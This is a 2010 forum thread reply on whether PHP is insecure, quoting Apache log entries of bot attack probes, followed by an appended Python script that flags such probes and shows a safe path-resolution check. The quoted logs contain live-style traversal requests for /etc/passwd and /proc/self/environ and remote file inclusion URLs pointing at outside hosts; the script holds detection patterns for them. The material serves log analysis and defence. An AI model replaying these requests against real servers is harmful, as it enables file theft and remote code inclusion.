Re: Shocking amount of PHP security holes? [message #171094 is a reply to message #171084]
Fri, 24 December 2010 15:56
Erwin Moller
On 12/23/2010 10:25 PM, Ignoramus30015 wrote:
> On 2010-12-23, Norman Peelman<npeelman(at)cfl(dot)rr(dot)com> wrote:
>> Ignoramus30015 wrote:
>>> I have been looking at my apache logs, and I see a tremendous amount
>>> of queries that clearly are attempts to hack me.
>>>
>>> One typical example
>>>
>>> 87.121.164.1 - - [22/Dec/2010:00:01:10 -0600] "GET /manuals/index.php?bi=./../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" my.site.com
>>>
>>
>> In this case apache returned a '404 Page not found'
>
> Yes, because I do not have index.php. The attacker was probing,
> hopeful to find it.
>
>>> Many other examples about, where attackers try to override system
>>> variables with web-supplied parameters. Kind of overriding PATH or
>>> LD_LIBRARY_PATH variables to subvert setuid programs.
>>>
>>> My main question is WTF? Why exactly does PHP let remote web users
>>> override those variables?
>>>
>>
>> Can you supply an example of this?
>
> Here are some from logs of algebra.com:
>
> 64.50.163.80 - - [23/Dec/2010:12:33:30 -0600] "GET /algebra/homework/Sequences-and-series//download.php?view.195/contact.php=IPCop../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 542 "-" "libwww-perl/5.837" www.algebra.com
> 109.72.95.75 - - [22/Dec/2010:03:35:48 -0600] "GET //bbs//include/print_category.php?setup[use_category]=1&dir=http://www.asdsingapore.com/includes/domit/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
> 209.62.76.194 - - [22/Dec/2010:07:09:14 -0600] "GET /algebra//dompdf/dompdf.php?input_file=http://indah1.webs.com/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
> 76.12.154.99 - - [22/Dec/2010:07:11:08 -0600] "GET //dompdf/dompdf.php?input_file=http://indah1.webs.com/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
> 24.173.234.213 - - [22/Dec/2010:15:47:36 -0600] "GET /admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70 HTTP/1.0" 404 542 "http://algebra.com/admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70" "Mozilla/4.0 (compatible;
>
Hello,
That means nothing.
That is just some bot trying to get into poorly configured systems.
My apache access logs are filled with attempts to run dll's and stuff
that breaks into IIS.
Does that mean my Apache/PHP is poorly configured? Of course not: it
just means that the scriptkiddies that run their 'hackorzz' scanning
software are just shooting a million times, and sometimes hit the
bullseye by accident.
If you don't know about file permissions, read/write/execute and stuff
like that, it is better NOT to set up a PHP system indeed. If you do
know about Unix administration you are fine to run PHP.
That is: if PHP runs under Apache. In case people use IIS, who needs to
break into the system via PHP anyway? (I have never used anything other
than Apache / IIS and Tomcat).
Under Apache, PHP often has the rights of a user named www-data (or
'nobody' or 'apache').
Take for example this one you posted:
87.121.164.1 - - [22/Dec/2010:00:01:10 -0600] "GET /manuals/index.php?bi=./../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" my.site.com
It is clearly an attempt to steal the passwd file from /etc/passwd.
While a passwd file is typically readable for all users/processes on
the system, it shouldn't be wide open for the world at large.
I don't know what /manuals/index.php is supposed to do in this hack
attempt, but apparently the ?bi=xxx is a way to request a file.
Now, if this index.php is written by an idiot, chances are that it will
fetch anything requested.
This is NOT a problem with PHP, this is a problem with running crap
software. The same can happen with *any* server-side language.
The script that runs at the server simply has the user rights of the
user it is running as.
So while I think you are wise not to run everything on your server (be
it PHP or ASP/VBscript or Perl or Java or Ruby or Python), it is a
strange thing to say this is a PHP only problem.
About the ENV being screwed up by PHP by just calling some crafted URL:
I don't think that is possible at all.
If you have an example of this: please post more information, since I am
curious.
Regards,
Erwin Moller
--
"There are two ways of constructing a software design: One way is to
make it so simple that there are obviously no deficiencies, and the
other way is to make it so complicated that there are no obvious
deficiencies. The first method is far more difficult."
-- C.A.R. Hoare
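Two things the thread talks past each other on can be shown in one short script: how to pick the probe requests out of the Apache access log lines quoted above (null bytes, `../` traversal, remote URLs in parameters, hex-escaped file names), and what check a `?bi=...` handler has to make so that it does not "fetch anything requested", which is Erwin's point that the limiting factor is the script, not the language. This is an added example, not code posted by any participant; the log lines are the ones quoted in the thread with line-wrap spaces rejoined and one referer shortened, while `DOCROOT`, the benign request and the `safe_resolve` name are assumed values for illustration.

```python
"""Classify the probe requests in the thread's Apache log lines and show the
path check a correctly written ``?bi=...`` handler has to make.

Added example for this thread, not code posted by any participant.
Log lines are quoted from the thread (wrap spaces rejoined, one referer
shortened); DOCROOT and the benign request are assumed values.
"""
import os
import re
from urllib.parse import parse_qsl, unquote

SAMPLE_LOG = [
    '87.121.164.1 - - [22/Dec/2010:00:01:10 -0600] "GET /manuals/index.php?bi=./../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" my.site.com',
    '64.50.163.80 - - [23/Dec/2010:12:33:30 -0600] "GET /algebra/homework/Sequences-and-series//download.php?view.195/contact.php=IPCop../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 542 "-" "libwww-perl/5.837" www.algebra.com',
    '109.72.95.75 - - [22/Dec/2010:03:35:48 -0600] "GET //bbs//include/print_category.php?setup[use_category]=1&dir=http://www.asdsingapore.com/includes/domit/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com',
    '24.173.234.213 - - [22/Dec/2010:15:47:36 -0600] "GET /admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70 HTTP/1.0" 404 542 "-" "Mozilla/4.0" www.algebra.com',
    # Constructed benign request for contrast (not from the thread).
    '203.0.113.7 - - [22/Dec/2010:09:00:00 -0600] "GET /manuals/index.php?bi=intro.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0" my.site.com',
]

# Combined log format with the vhost appended, as in the quoted lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# ".." as a whole path segment after decoding, in either slash style.
TRAVERSAL_RE = re.compile(r'(^|[/\\])\.\.([/\\]|$)')
# Eight or more back-to-back %XX escapes: a plain file name hidden from naive filters.
HEX_RUN_RE = re.compile(r'(?:%[0-9A-Fa-f]{2}){8,}')
SENSITIVE = ('/etc/passwd', '/proc/self/environ')


def parse_log_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(target):
    """Return the sorted indicator names found in one request target."""
    _path, _, raw_query = target.partition('?')
    decoded = unquote(raw_query)
    found = set()
    if '\x00' in decoded:                 # %00 truncated paths in old PHP file functions
        found.add('null-byte')
    if TRAVERSAL_RE.search(decoded):
        found.add('traversal')
    if HEX_RUN_RE.search(raw_query):
        found.add('hex-encoded-value')
    for _key, value in parse_qsl(raw_query, keep_blank_values=True):
        if value.lower().startswith(('http://', 'https://', 'ftp://')):
            found.add('remote-url')       # remote file inclusion probe
        if any(name in value for name in SENSITIVE):
            found.add('sensitive-file')
    return sorted(found)


def scan(lines):
    """Return (ip, target, status, indicators) for every line that trips a rule."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        indicators = classify(rec['target'])
        if indicators:
            hits.append((rec['ip'], rec['target'], rec['status'], indicators))
    return hits


DOCROOT = '/var/www/manuals'   # assumed document root of the hypothetical index.php


def safe_resolve(docroot, requested):
    """Map a user-supplied name onto a file under docroot, or return None.

    This is the check a sane ``?bi=`` handler needs: refuse embedded NUL bytes,
    then resolve the path and require it to stay inside docroot. Running as
    www-data limits the damage but does not replace this check, because
    www-data can read /etc/passwd like everyone else.
    """
    if '\x00' in requested:
        return None
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == '__main__':
    for ip, target, status, indicators in scan(SAMPLE_LOG):
        print(f'{ip:16} {status} {", ".join(indicators):36} {target[:60]}')
    print(safe_resolve(DOCROOT, 'intro.html'))
    print(safe_resolve(DOCROOT, unquote('./../../../../../../../../../../../etc/passwd%00')))
```

The classifier keys on the request shape rather than on the status code, because, as the thread notes, a 404 only says the probed script was absent on this host; the same request against a host that has a careless `index.php` would return 200 and the file. `safe_resolve` rejects the quoted `/etc/passwd` request, an absolute path, and any `..` that escapes the root, while letting `intro.html` through.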